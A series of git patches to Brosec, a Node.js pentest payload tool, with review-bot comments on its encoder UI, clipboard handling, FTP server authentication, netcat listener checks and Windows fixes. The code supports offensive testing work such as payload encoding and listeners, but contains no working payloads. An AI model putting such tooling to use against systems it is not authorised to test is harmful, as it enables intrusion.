false; + return new Buffer(data).toString('hex'); + } catch (err) { + return data; + } }, 'title': 'Hex' }] 
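Review bot: HTML `DEC` is the only codec in this hunk that does not reset `keychanged`, so while decoding HTML the interval's `if (keychanged)` branch re-runs the decode and re-renders every 5 ms — the busy loop this commit sets out to remove. HTML `ENC` also calls `console.log(err)` inside its catch, which prints underneath the blessed screen and garbles it. Rather than having every codec reach into the flag, clear it once where it is consumed — in the interval, `if (keychanged) { keychanged = false; outputValue = encode(inputBox.getContent()); box.setContent(outputValue); }` — and keep the codecs as plain try/return functions. Hex `DEC` still decodes with `'ascii'` while Base64 `DEC` switches to the default utf8 here; the two should agree.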
@@ -57,38 +90,13 @@ function setTitle(title, mode) { var a = log.cyanBright("a"); var t = log.cyanBright("t"); var ret = log.cyanBright("return"); - var instructions = "\n\nChange (E)ncoding: " + log.blackBright("Ctrl + "+e+"") + "\n(A)pply to input: " + log.blackBright("Ctrl + "+a) + " \n(T)oggle Mode: " + log.blackBright("Ctrl + "+t) + "\n\nPress " + ret + " to exit."; + var instructions = "\n\nChange (E)ncoding: " + log.blackBright("Ctrl + " + e + "") + "\n(A)pply to input: " + log.blackBright("Ctrl + " + a) + " \n(T)oggle Mode: " + log.blackBright("Ctrl + " + t) + "\n\nPress " + ret + " to exit."; var broTitle = "\nCurrent Mode: " + log.blackBright(mode) + " \nCurrent Encoding: " + log.blackBright(title) + instructions; return broTitle; } var modeTitle = setTitle(modes[counter]['title'], methodTitle); var encode = modes[0][method]; -function toggleMode() { - if (method === 'ENC') { - method = 'DEC'; - encode = modes[counter][method]; - methodTitle = 'Decoding'; - modeTitle = setTitle(modes[counter]['title'], methodTitle); - } else { - method = 'ENC'; - encode = modes[counter][method]; - methodTitle = 'Encoding'; - modeTitle = setTitle(modes[counter]['title'], methodTitle); - } -} - -function toggleEncoding() { - if (counter < (modes.length - 1)) { - counter += 1; - } else { - counter = 0; - } - encode = modes[counter]['ENC']; - modeTitle = setTitle(modes[counter]['title'], methodTitle); - -} - exports.init = function(input) { var screen = blessed.screen({ @@ -118,7 +126,7 @@ exports.init = function(input) { style: { fg: 'green' }, - top: '12%', + top: '12%', // border: { // type: 'bg', // ch: '_', 
@@ -150,43 +158,71 @@ exports.init = function(input) { inputBox.focus(); screen.render(); if (input) { + keychanged = true; inputBox.setValue(input); } setInterval(function() { - if(keychanged){ - outputValue = encode(inputBox.getContent()); - justatest = outputValue; - box.setContent(outputValue); - list.setContent(modeTitle); - screen.render(); + if (keychanged) { + outputValue = encode(inputBox.getContent()); + box.setContent(outputValue); } + list.setContent(modeTitle); + screen.render(); }, 5) + list.setContent(modeTitle); - screen.render(); }, 50) screen.render(); + function refreshScreen() { + outputValue = encode(inputBox.getContent()); + box.setContent(outputValue); + list.setContent(modeTitle); + screen.render(); + } + + function toggleEncoding() { + if (counter < (modes.length - 1)) { + counter += 1; + } else { + counter = 0; + } + encode = modes[counter][method]; + modeTitle = setTitle(modes[counter]['title'], methodTitle); + refreshScreen(); + } + function toggleMode() { + if (method === 'ENC') { + method = 'DEC'; + encode = modes[counter][method]; + methodTitle = 'Decoding'; + modeTitle = setTitle(modes[counter]['title'], methodTitle); + } else { + method = 'ENC'; + encode = modes[counter][method]; + methodTitle = 'Encoding'; + modeTitle = setTitle(modes[counter]['title'], methodTitle); + } + refreshScreen(); + } inputBox.focus(); function eHandler() { this.init = inputBox.onceKey('C-e', function(ch, key) { inputBox.unkey('C-e'); - - setTimeout(function() { - toggleEncoding(); - eHandler(); - }, 100) + keypress = true; + toggleEncoding(); + eHandler(); }) } function tHandler() { this.init = inputBox.onceKey('C-t', function(ch, key) { inputBox.unkey('C-t'); - setTimeout(function() { - toggleMode(); - tHandler(); - }, 100) + keypress = true; + toggleMode(); + tHandler(); }) } var inputBoxFocusHandler = function() { 
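Review bot: `keypress = true;` in `eHandler` and `tHandler` assigns an identifier declared nowhere in the file, creating an implicit global (a ReferenceError under `'use strict'`); from the surrounding logic it looks like `keychanged = true;` was meant, though `refreshScreen()` on the next line already re-encodes and re-renders, so the assignment may be unnecessary altogether. `this.init = inputBox.onceKey(...)` in these plain functions writes to the global object and the value is never read, so `inputBox.onceKey(...)` alone is enough, and if `onceKey` removes itself after firing, as its name suggests, the `inputBox.unkey('C-e')` / `unkey('C-t')` calls inside the callbacks are redundant. `toggleEncoding` and `toggleMode` now close over the per-call `screen`/`box`, which is fine, but `counter` and `method` remain module-level, so a second `init` in the same process starts from the previous session's state. `init` continues outside the hunk.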
@@ -194,11 +230,11 @@ exports.init = function(input) { inputBox.key('C-c', function() { return process.exit(0); }) - inputBox.on('keypress', function(){ - if (!keychanged){ - outputValue = encode(inputBox.getContent()); - keychanged = true; - } + inputBox.on('keypress', function() { + if (!keychanged) { + refreshScreen(); + keychanged = true; + } }) eHandler(); @@ -207,6 +243,8 @@ exports.init = function(input) { inputBox.key('C-a', function(ch, key) { inputBox.setValue(outputValue); + keychanged = true; + outputValue = encode(inputBox.getContent()); }) inputBox.key('enter', function(ch, key) { @@ -220,7 +258,6 @@ exports.init = function(input) { setTimeout(function() { output.cmd(outputValue); - return process.exit(0); }, 50) inputBox.unkey('enter'); diff --git a/modules/output.js b/modules/output.js index 1073a08..af81bf4 100644 --- a/modules/output.js +++ b/modules/output.js 
@@ -3,42 +3,21 @@ var exec = require('child_process').exec; var log = require('cli-color'); var os = require('os'); var menu = require('./menu'); +var ncp = require("copy-paste"); var red = log.red var warn = function(){ - console.log(red("\nError: Missing required variable. See \"help\" for more information.")) - menu.mainMenu() + setTimeout(function(){ + console.log(red("\nError: Missing required variable. See \"help\" for more information.")); + },50) } exports.cmd = function(input){ - - input = input.replace(/(\\')/gi,"'") - // TODO ^ do we need this? - //input = input.replace(/(@@)/gi,"\\") - - if (input.match(/(\\)/gi)){ - console.log(log.yellow('\n'+input+'\n')) - input = input.replace(/(\\)/gi,"\\\\") - } - else { - console.log(log.yellow('\n'+input+'\n')) - } - input = input.replace(/(\$)/gi,"\\\$") - input = input.replace(/(")/gi,"\\\"") - - var currentOS = os.type() - - if (currentOS === "Darwin"){ - exec("printf \"%s\" \""+input+"\"| pbcopy", print); - } - else if (currentOS === "Linux"){ - exec("printf \"%s\" \""+input+"\"| xsel -i -b", print); - } - else { - exec("echo \""+input+"\" | clip", print); - } - - console.log(log.green('Output copied to clipboard!')); + ncp.copy(input, function () { + console.log(log.green('Output copied to clipboard!')); + console.log(log.yellow('\n'+input+'\n')) + process.exit(1); + }) } exports.prepare = function(payload, lhost, lport, rhost, rport, user, path, callback, tmenu){ @@ -55,7 +34,6 @@ exports.prepare = function(payload, lhost, lport, rhost, rport, user, path, call if(typeof(userResponse) === "string"){ payload = payload.replace(/((<(PROMPT)\s*?.*?>))/gi, userResponse) - //payload = payload.replace(/(\\)/gi,"@@") } else { tmenu() return 
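Review bot: `process.exit(1)` inside the `ncp.copy` callback exits with a failure status on the success path, so anything scripting `bros` sees every successful copy as an error; it should be `process.exit(0);`, with a non-zero code reserved for a copy that actually failed. The callback also ignores whatever the library reports — if copy-paste passes an error as the first callback argument, check it before printing 'Output copied to clipboard!'. Dropping the string-built `exec("printf \"%s\" \""+input+"\"| pbcopy", ...)` pipeline does fix a real problem: payload text was being spliced into a shell command line and escaped by hand, whereas copy-paste (assuming it hands the text to the clipboard tool over stdin) never lets the payload reach a shell.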
@@ -70,7 +48,6 @@ exports.prepare = function(payload, lhost, lport, rhost, rport, user, path, call payload = payload.replace(/((<(USER)\s*?.*?>))/gi, user) payload = payload.replace(/((<(PATH)\s*?.*?>))/gi, path) - payload = payload.replace(/(')/gi, "\\'") if(payload.match(/undefined/)){ warn() return false; diff --git a/modules/questionUser.js b/modules/questionUser.js index 182d3d6..ed0de5d 100644 --- a/modules/questionUser.js +++ b/modules/questionUser.js @@ -32,7 +32,11 @@ exports.http = function(callback) { exports.ncat = function(callback) { var port = db.getConfig("LPORT") - + if (!port){ + console.log(log.red("[!] Missing required variable LPORT")); + console.log("Have you tried the "+log.green("help")+" command?"); + return false; + } prompt.message = "Should I start a tcp listener on port "+port+" for you? (Y/n) :" prompt.get([{ name: '_', @@ -58,6 +62,11 @@ exports.ncat = function(callback) { exports.ncatReceiveFile = function(callback) { var port = db.getConfig("LPORT"); + if (!port){ + console.log(log.red("[!] Missing required variable LPORT")); + console.log("Have you tried the "+log.green("help")+" command?"); + return false; + } var path = process.cwd()+"/"; var localFile = finalAnswer.replace(/(\/)/g, "_") diff --git a/package.json b/package.json index 5a42b61..d3ed2d8 100644 --- a/package.json +++ b/package.json @@ -26,7 +26,8 @@ "simple-git": "*", "ftpd": "*", "blessed": "*", - "js-htmlencode": "*" + "js-htmlencode": "*", + "copy-paste":"*" }, "author": "Gabe Marshall", "license": "ISC" From 35e76de096f2c26ee9d3bb66ffceffb4a1fed731 Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Tue, 26 Jul 2016 16:31:25 -0400 Subject: [PATCH 09/18] Minor bug fix in encoder C-a apply method --- modules/encoder.js | 25 ++++++++++++++++--------- 1 file changed, 16 insertions(+), 9 deletions(-) diff --git a/modules/encoder.js b/modules/encoder.js index 883328e..0bcea74 100644 --- a/modules/encoder.js +++ b/modules/encoder.js 
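Review bot: The new `"copy-paste":"*"` entry accepts any published version, so a fresh `npm install` of a tool that puts attacker-supplied payloads on the clipboard will pull whatever the registry serves that day, including a hijacked or breaking release; pin it to the version you tested, e.g. `"copy-paste": "x.y.z"` with the real number, and commit a lockfile so installs are reproducible. The other `*` ranges predate this commit, but the new dependency is the one under review and is the easiest place to start.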
@@ -3,7 +3,6 @@ var blessed = require("blessed"), htmlEncode = require('js-htmlencode').htmlEncode, htmlDecode = require('js-htmlencode').htmlDecode, outputValue = '', - justatest = '', counter = 0, keychanged = false; @@ -20,8 +19,10 @@ var modes = [{ } }, 'ENC': function(data) { - keychanged = false; - return encodeURIComponent(data); + keychanged = false; + var a = encodeURIComponent(data); + a = a.replace(/(')/g, "%27") + return a; }, 'title': 'URL' }, { @@ -192,6 +193,7 @@ exports.init = function(input) { modeTitle = setTitle(modes[counter]['title'], methodTitle); refreshScreen(); } + function toggleMode() { if (method === 'ENC') { method = 'DEC'; @@ -225,6 +227,16 @@ exports.init = function(input) { tHandler(); }) } + + function aHandler() { + this.init = inputBox.key('C-a', function(ch, key) { + inputBox.unkey('C-a'); + keypress = true; + inputBox.setValue(outputValue); + outputValue = encode(inputBox.getContent()); + refreshScreen(); + }) + } var inputBoxFocusHandler = function() { inputBox.key('C-c', function() { @@ -238,14 +250,9 @@ exports.init = function(input) { }) eHandler(); - tHandler(); + aHandler(); - inputBox.key('C-a', function(ch, key) { - inputBox.setValue(outputValue); - keychanged = true; - outputValue = encode(inputBox.getContent()); - }) inputBox.key('enter', function(ch, key) { From 47fbd6f4a2a26260f68cd73f189b323cd8c13012 Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Tue, 26 Jul 2016 16:37:40 -0400 Subject: [PATCH 10/18] Minor performance improvements to encoder module --- modules/encoder.js | 25 +++---------------------- 1 file changed, 3 insertions(+), 22 deletions(-) diff --git a/modules/encoder.js b/modules/encoder.js index 0bcea74..b4a8ac3 100644 --- a/modules/encoder.js +++ b/modules/encoder.js 
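Review bot: `this.init = inputBox.key('C-a', ...)` in the new aHandler (copied from eHandler/tHandler) runs as a plain function call, so in sloppy mode `this` is the global object and the assignment creates a global `init`; under `'use strict'` it would throw because `this` is undefined. Nothing in the visible hunks reads `.init`, so the assignment can simply go: `inputBox.key('C-a', function(ch, key) {`. The enclosing exports.init starts and ends outside this hunk.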
@@ -21,7 +21,9 @@ var modes = [{ 'ENC': function(data) { keychanged = false; var a = encodeURIComponent(data); - a = a.replace(/(')/g, "%27") + a = a.replace(/(')/g, "%27"); + a = a.replace(/(\()/g, "%28"); + a = a.replace(/(\))/g, "%29"); return a; }, 'title': 'URL' @@ -128,11 +130,6 @@ exports.init = function(input) { fg: 'green' }, top: '12%', - // border: { - // type: 'bg', - // ch: '_', - // fg: "#27ea09" - // }, left: 'center', }) screen.append(list); @@ -253,7 +250,6 @@ exports.init = function(input) { tHandler(); aHandler(); - inputBox.key('enter', function(ch, key) { var command = inputBox.getValue(); @@ -276,21 +272,6 @@ exports.init = function(input) { }; inputBox.on('focus', inputBoxFocusHandler); - setTimeout(function() { - screen.render(); - }, 50) - - screen.key('tab', function(ch, key) { - if (inputBox.focused) { - list.focus(); - } else { - inputBox.focus(); - } - - screen.render(); - }); - - screen.key(['escape', 'q', 'C-c'], function(ch, key) { return process.exit(0); }); From e7638a2aa0e52ff24044eb1d47157b6a4d01c69e Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Wed, 27 Jul 2016 10:58:58 -0400 Subject: [PATCH 11/18] Fix in apply method MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The apply encoding output to the input field wasn’t working after being used once. This bug was fixed, and the menu description was changed a bit. --- modules/encoder.js | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/modules/encoder.js b/modules/encoder.js index b4a8ac3..ec0f6ac 100644 --- a/modules/encoder.js +++ b/modules/encoder.js 
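Review bot: The URL encoder now patches `'`, `(` and `)` one character at a time, but `encodeURIComponent` also leaves the sub-delimiters `!` and `*` untouched, so a payload such as `alert(1)!` or a wildcard still goes out partly raw; one pass over the whole set is shorter and closes the gap: `return encodeURIComponent(data).replace(/[!'()*]/g, function (c) { return '%' + c.charCodeAt(0).toString(16).toUpperCase(); });`. That reproduces the current `%27`/`%28`/`%29` output exactly and adds `%21` and `%2A` (add `~` to the class if you want `%7E` too).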
@@ -93,7 +93,7 @@ function setTitle(title, mode) { var a = log.cyanBright("a"); var t = log.cyanBright("t"); var ret = log.cyanBright("return"); - var instructions = "\n\nChange (E)ncoding: " + log.blackBright("Ctrl + " + e + "") + "\n(A)pply to input: " + log.blackBright("Ctrl + " + a) + " \n(T)oggle Mode: " + log.blackBright("Ctrl + " + t) + "\n\nPress " + ret + " to exit."; + var instructions = "\n\nChange (E)ncoding type: " + log.blackBright("Ctrl + " + e + "") + "\n(A)pply Output value to Input: " + log.blackBright("Ctrl + " + a) + " \n(T)oggle Encoding/Decoding: " + log.blackBright("Ctrl + " + t) + "\n\nPress " + ret + " to exit."; var broTitle = "\nCurrent Mode: " + log.blackBright(mode) + " \nCurrent Encoding: " + log.blackBright(title) + instructions; return broTitle; } @@ -205,6 +205,12 @@ exports.init = function(input) { } refreshScreen(); } + + function applyMode() { + inputBox.setValue(outputValue); + outputValue = encode(inputBox.getContent()); + refreshScreen(); + } inputBox.focus(); function eHandler() { @@ -226,12 +232,11 @@ exports.init = function(input) { } function aHandler() { - this.init = inputBox.key('C-a', function(ch, key) { + this.init = inputBox.onceKey('C-a', function(ch, key) { inputBox.unkey('C-a'); keypress = true; - inputBox.setValue(outputValue); - outputValue = encode(inputBox.getContent()); - refreshScreen(); + applyMode(); + aHandler(); }) } var inputBoxFocusHandler = function() { From 700be0e6d3514b1d9492f0d1c9432ce31c35cbb9 Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Fri, 29 Jul 2016 14:46:00 -0400 Subject: [PATCH 12/18] Added auth to bros ftp --- bros | 13 +++------- modules/webserver/simpleFtp.js | 46 +++++++++++++++++++++++----------- 2 files changed, 35 insertions(+), 24 deletions(-) diff --git a/bros b/bros index 584ee77..7d48343 100755 --- a/bros +++ b/bros 
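Review bot: In the reworked aHandler, `inputBox.onceKey('C-a', ...)` is presumably a once-listener that detaches itself after the first firing, which would make the `inputBox.unkey('C-a');` inside the callback redundant — and since `unkey` removes every C-a listener on the box, it would also strip any other C-a binding registered there; unless one exists, drop that line and keep `onceKey` plus the `aHandler()` re-register. `applyMode` feeds the current output straight back through `encode` with no guard; if any DEC function throws on non-decodable input, a stray C-a would take the whole encoder down, so it is worth confirming what the decoders do on garbage. exports.init starts before this hunk.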
@@ -18,11 +18,6 @@ var firstArgument = argv._[0]; var secondArgument = argv._[1]; var thirdArgument = argv._[2]; - - - - - function getFirstArgValue(arg) { switch (arg) { case 1: @@ -95,11 +90,11 @@ function parseArgs() { utilities.update(); } else if (firstArgument === "ENCODE"){ if (secondArgument){ - utilities.encoder(oldSecondary); + utilities.encoder(oldSecondary); } else { utilities.encoder(); } - + } else if (firstArgument+" "+secondArgument === "SET LHOST" && !thirdArgument){ interfaces.setlhost(); @@ -109,10 +104,10 @@ function parseArgs() { } else if (firstArgument === "HELP") { check.allInputChecks(firstArgument, menu.mainMenu, menu.mainMenu); } else if (firstArgument === "CLEAN") { - child_process.execFile('rm', [settings.dbPath], function(error, stdout, stderr){ + child_process.execFile('rm', [settings.dbPath], function(error, stdout, stderr){ }); console.log("The Brosec database located at %s has been wiped.", settings.dbPath) - } + } else { check.allInputChecks(firstArgument, console.log, console.log) } diff --git a/modules/webserver/simpleFtp.js b/modules/webserver/simpleFtp.js index 68948ac..5a0396a 100644 --- a/modules/webserver/simpleFtp.js +++ b/modules/webserver/simpleFtp.js @@ -2,16 +2,19 @@ var ftpd = require('ftpd'); var fs = require('fs'); var path = require('path'); var log = require('../log.js'); -var keyFile; -var certFile; -var server; +var argv = require('yargs').argv; +var userArg = argv.username; +var passArg = argv.password; +var keyFile, certFile, server; var options = { host: process.env.IP || '127.0.0.1', port: process.env.PORT || 7002, tls: null, }; + var startFtpServer = function(protocol){ + console.log(" [!] WARNING: This ftp server is not intended to be secure and should be used with caution.\n") if (protocol === "ftps"){ console.log("ftps") options.tls = { 
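Review bot: `argv.password` takes the FTP password from the command line, so it is visible to every local user via `ps` or `/proc/<pid>/cmdline` and is written to shell history; read it from an environment variable or prompt for it (the `prompt` module is already a dependency) and only fall back to the flag, e.g. `var passArg = argv.password || process.env.BROS_FTP_PASSWORD;`. The added WARNING banner is a good caveat, but the exposure happens before the server even starts. Note too that yargs parses a bare `--password` with no value as `true`, which the later `pass === passArg` comparison can never match, so a forgotten value silently locks everyone out instead of producing an error.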
@@ -44,33 +47,46 @@ var startFtpServer = function(protocol){ var username = null; console.log('client connected: ' + connection.remoteAddress); connection.on('command:user', function(user, success, failure) { - if (user) { - username = user; - success(); - } else { - failure(); - } + if (user) { + username = user; + success(); + } else { + failure(); + } }); connection.on('command:pass', function(pass, success, failure) { - if (pass) { - success(username); + if(!passArg){ + if (pass) { + success(username); + } else { + failure(); + } } else { - failure(); + if (pass === passArg){ + success(username); + } else { + failure(); + } } }); }); server.debugging = 4; - + ftpPort = options.port if (!ftpPort){ ftpPort = 2121; } - + server.listen(ftpPort); - console.log(" [*] An "+log.status("anonymous")+" "+protocol+" server is serving "+process.cwd()+" on port "+ftpPort+" (ctrl c to stop)"); + var ftpType = " anonymous "; + if (userArg){ + ftpType = ""; + } + console.log(" [*] An"+log.status(ftpType)+" "+protocol+" server is serving "+process.cwd()+" on port "+ftpPort+" (ctrl c to stop)"); + } From 0abcb7de21cdee5a93c362cd2c8f90f606f1f508 Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Fri, 29 Jul 2016 15:09:18 -0400 Subject: [PATCH 13/18] Fixes for better Windows support --- bros | 14 +++++++++++++- db/db.js | 18 +++++++++++------- 2 files changed, 24 insertions(+), 8 deletions(-) diff --git a/bros b/bros index 7d48343..a802e6f 100755 --- a/bros +++ b/bros @@ -3,6 +3,7 @@ var argv = require('yargs').argv, log = require('cli-color'), db = require('./db/db'), + os = require('os'), menu = require('./modules/menu'), secondaryMenu = require("./modules/secondaryMenu"), check = require('./modules/inputChecks'), 
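Review bot: The `command:user` handler still accepts any username — `userArg` is parsed in the previous hunk but never compared, so `--username bob --password s3cret` lets a client log in as `alice` (or anything) with the right password, and the configured name only changes the "anonymous" label in the banner. Worse, with `--username` but no `--password`, `passArg` is undefined, the first branch of `command:pass` runs and any password is accepted while the banner no longer says anonymous. Treat the two flags as a pair and check both, as below; a `crypto.timingSafeEqual` comparison is optional for a throwaway pentest listener but cheap if you want it. startFtpServer continues outside this hunk.
```javascript
if (Boolean(userArg) !== Boolean(passArg)) {
    console.log(" [!] --username and --password must be given together.");
    return;
}
var authRequired = Boolean(userArg);
// … unchanged: ftps/tls option setup, server construction …
connection.on('command:user', function(user, success, failure) {
    if (user && (!authRequired || user === userArg)) {
        username = user;
        success();
    } else {
        failure();
    }
});
connection.on('command:pass', function(pass, success, failure) {
    if (pass && (!authRequired || (username === userArg && pass === passArg))) {
        success(username);
    } else {
        failure();
    }
});
// … unchanged: server.debugging, port fallback, listen and banner …
```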
@@ -104,7 +105,18 @@ function parseArgs() { } else if (firstArgument === "HELP") { check.allInputChecks(firstArgument, menu.mainMenu, menu.mainMenu); } else if (firstArgument === "CLEAN") { - child_process.execFile('rm', [settings.dbPath], function(error, stdout, stderr){ + + var currentOS = os.type(); + var cmd = "rm"; + var dir = settings.dbPath; + if (currentOS.match("Windows")){ + cmd = "del"; + var dir = os.tmpdir()+"\\bros.db"; + } else { + + } + + child_process.execFile(cmd, [dir], function(error, stdout, stderr){ }); console.log("The Brosec database located at %s has been wiped.", settings.dbPath) } diff --git a/db/db.js b/db/db.js index 820b5ac..a2ac3e0 100644 --- a/db/db.js +++ b/db/db.js @@ -1,10 +1,15 @@ var dirty = require('dirty'); -var settings = require('../settings.js') - +var settings = require('../settings.js'); +var os = require('os'); // By default, brosec stores its data file in /var/tmp // Change storage location by altering settings.js try { - var db = dirty(settings.dbPath); + var currentOS = os.type(); + if (currentOS.match("Windows")){ + var db = dirty(os.tmpdir()+"\\bros.db"); + } else { + var db = dirty(settings.dbPath); + } } catch (err){ console.log("There was a problem initializing the bros. Check the settings.js file to specify a valid storage location.") @@ -19,7 +24,7 @@ exports.new = function(title, description){ } exports.newConfig = function(key, val){ - var keyExists = false + var keyExists = false db.forEach(function(keyStore, valStore) { if (key === keyStore){ keyExists = true @@ -33,7 +38,7 @@ exports.newConfig = function(key, val){ } else { db.set(key, val) - } + } db.on('drain', function() { }); } @@ -52,11 +57,10 @@ function getConfig(value){ } // If none exist else { - + } }); return test } exports.getConfig = getConfig; - From 1e36704bfdc14a28ab3cb86e41415c9afd9411b9 Mon Sep 17 00:00:00 2001 
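Review bot: `child_process.execFile(cmd, [dir], ...)` with `cmd = "del"` cannot work on Windows — `del` is a cmd.exe builtin, not an executable, and execFile spawns without a shell, so the call fails with ENOENT; the callback then discards `error` and the "has been wiped" message is printed unconditionally (and names `settings.dbPath` while `dir` may differ). `fs.unlink` removes a file on every platform without spawning anything, which also retires the `rm`/`del` dispatch; it needs `fs = require('fs')` next to the `os` require added at the top of `bros`. The duplicated `var dir` inside the `if` can go as well. parseArgs continues outside this hunk.
```javascript
// … unchanged: currentOS / dir selection …
fs.unlink(dir, function(error){
  if (error){
    console.log("Could not remove the Brosec database at %s: %s", dir, error.message);
    return;
  }
  console.log("The Brosec database located at %s has been wiped.", dir);
});
```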
From: gabemarshall Date: Fri, 29 Jul 2016 15:21:38 -0400 Subject: [PATCH 14/18] Fixed bug that was causing nc payloads to end prematurely --- modules/encoder.js | 2 +- modules/output.js | 6 ++++-- 2 files changed, 5 insertions(+), 3 deletions(-) diff --git a/modules/encoder.js b/modules/encoder.js index ec0f6ac..4711014 100644 --- a/modules/encoder.js +++ b/modules/encoder.js @@ -265,7 +265,7 @@ exports.init = function(input) { screen.destroy(); setTimeout(function() { - output.cmd(outputValue); + output.cmd(outputValue, true); }, 50) inputBox.unkey('enter'); diff --git a/modules/output.js b/modules/output.js index af81bf4..0dfc055 100644 --- a/modules/output.js +++ b/modules/output.js @@ -12,11 +12,13 @@ var warn = function(){ },50) } -exports.cmd = function(input){ +exports.cmd = function(input, encoder){ ncp.copy(input, function () { console.log(log.green('Output copied to clipboard!')); console.log(log.yellow('\n'+input+'\n')) - process.exit(1); + if (encoder){ + process.exit(1); + } }) } From 3c75ff45c58826806dfcd0e442049485ce28f0a7 Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Fri, 29 Jul 2016 16:59:57 -0400 Subject: [PATCH 15/18] Minor fixes for Windows compatibility --- .gitignore | 1 - bros | 1 - db/db.js | 7 +------ package.json | 7 +++++-- settings.js | 17 ++++++++--------- 5 files changed, 14 insertions(+), 19 deletions(-) diff --git a/.gitignore b/.gitignore index 105265f..9c243fb 100644 --- a/.gitignore +++ b/.gitignore @@ -26,4 +26,3 @@ build/Release # https://www.npmjs.org/doc/misc/npm-faq.html#should-i-check-my-node_modules-folder-into-git node_modules bros.db -settings.js diff --git a/bros b/bros index a802e6f..38975f8 100755 --- a/bros +++ b/bros @@ -111,7 +111,6 @@ function parseArgs() { var dir = settings.dbPath; if (currentOS.match("Windows")){ cmd = "del"; - var dir = os.tmpdir()+"\\bros.db"; } else { } diff --git a/db/db.js b/db/db.js index a2ac3e0..60f5535 100644 --- a/db/db.js +++ b/db/db.js 
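Review bot: `output.cmd` still terminates with `process.exit(1)` when the `encoder` flag is set, which reports failure to the calling shell on the success path; the only reason to exit here is that the blessed screen has already been destroyed, so use `process.exit(0);` and keep non-zero for a copy that failed. The new positional boolean deserves a line of documentation since its meaning lives in encoder.js: `/** @param {boolean} [encoder] exit after copying; the encoder UI has already torn down its screen */` above `exports.cmd`.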
@@ -4,12 +4,7 @@ var os = require('os'); // By default, brosec stores its data file in /var/tmp // Change storage location by altering settings.js try { - var currentOS = os.type(); - if (currentOS.match("Windows")){ - var db = dirty(os.tmpdir()+"\\bros.db"); - } else { - var db = dirty(settings.dbPath); - } + var db = dirty(settings.dbPath); } catch (err){ console.log("There was a problem initializing the bros. Check the settings.js file to specify a valid storage location.") diff --git a/package.json b/package.json index d3ed2d8..4ab82b7 100644 --- a/package.json +++ b/package.json @@ -1,8 +1,8 @@ { "name": "Brosec", - "version": "1.1.0", + "version": "1.1.1", "description": "Brosec - Pentest fu for bros", - "main": "bros.js", + "main": "bros", "repository": { "type": "git", "url": "git://github.com/gabemarshall/Brosec.git" @@ -10,6 +10,9 @@ "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, + "bin": { + "bros": "./bros" + }, "dependencies": { "cli-color": "*", "cli-table": "*", diff --git a/settings.js b/settings.js index d38c3d7..63c6c02 100644 --- a/settings.js +++ b/settings.js @@ -1,16 +1,15 @@ -var settings = {} +var settings = {}, + os = require('os'); // ---[Db Storage Path]--- // Brosec stores variable values using the nodejs dirty module -settings.dbPath = '/var/tmp/bros.db' - -// ---[netcat]--- -// (ex: ncat, netcat, nc.traditional) - -settings.netcat = "netcat" - - +var currentOS = os.type(); +if (currentOS.match("Windows")){ + settings.dbPath = dirty(os.tmpdir()+"\\bros.db"); +} else { + settings.dbPath = '/var/tmp/bros.db' +} module.exports = settings; From 77cb3be7721395dec97abb1942acf85bc7eae857 Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Fri, 29 Jul 2016 17:11:32 -0400 Subject: [PATCH 16/18] Changes to settings file --- db/db.js | 2 +- modules/questionUser.js | 2 +- settings.js => modules/settings.js | 2 ++ 3 files changed, 4 insertions(+), 2 deletions(-) rename settings.js => modules/settings.js (99%) 
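Review bot: The Windows branch of the new settings.js does `settings.dbPath = dirty(os.tmpdir()+"\\bros.db");`, but the file only requires `os`, so on Windows it throws `ReferenceError: dirty is not defined` at load — and even with the require it would store a dirty instance where db.js expects a path string (it calls `dirty(settings.dbPath)`) and where the CLEAN command passes the value to `del`. It should be the plain path: `settings.dbPath = os.tmpdir() + "\\bros.db";` (or `require('path').join(os.tmpdir(), 'bros.db')`). The same hunk silently drops `settings.netcat`; if modules/nc.js or questionUser.js still read it, that value is now undefined, so a grep before release is worthwhile.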
diff --git a/db/db.js b/db/db.js index 60f5535..8276a94 100644 --- a/db/db.js +++ b/db/db.js @@ -1,5 +1,5 @@ var dirty = require('dirty'); -var settings = require('../settings.js'); +var settings = require('./settings.js'); var os = require('os'); // By default, brosec stores its data file in /var/tmp // Change storage location by altering settings.js diff --git a/modules/questionUser.js b/modules/questionUser.js index ed0de5d..e865430 100644 --- a/modules/questionUser.js +++ b/modules/questionUser.js @@ -2,7 +2,7 @@ var prompt = require('prompt'), os = require('os'), log = require('cli-color'), web = require("./webserver/webserver.js"), - settings = require('../settings.js'), + settings = require('./settings.js'), db = require('../db/db'), currentOS = os.type(), netcat = require('./nc'), diff --git a/settings.js b/modules/settings.js similarity index 99% rename from settings.js rename to modules/settings.js index 63c6c02..cc78dd6 100644 --- a/settings.js +++ b/modules/settings.js @@ -12,4 +12,6 @@ if (currentOS.match("Windows")){ settings.dbPath = '/var/tmp/bros.db' } + + module.exports = settings; From ddf778a8e6b4cfe333eac9600d8a3bcad9a86145 Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Fri, 29 Jul 2016 17:14:06 -0400 Subject: [PATCH 17/18] Fixed typo in settingsrequire statement --- bros | 2 +- db/db.js | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/bros b/bros index 38975f8..1f78909 100755 --- a/bros +++ b/bros @@ -10,7 +10,7 @@ var argv = require('yargs').argv, simpleWeb = require('./modules/webserver/simple.js'), simpleFtp = require('./modules/webserver/simpleFtp.js'), interfaces = require('./modules/interfaces'), - settings = require('./settings'), + settings = require('./modules/settings'), child_process = require('child_process'), utilities = require('./modules/utilities'), log = require('./modules/log.js'); diff --git a/db/db.js b/db/db.js index 8276a94..2aa0a85 100644 --- a/db/db.js +++ b/db/db.js 
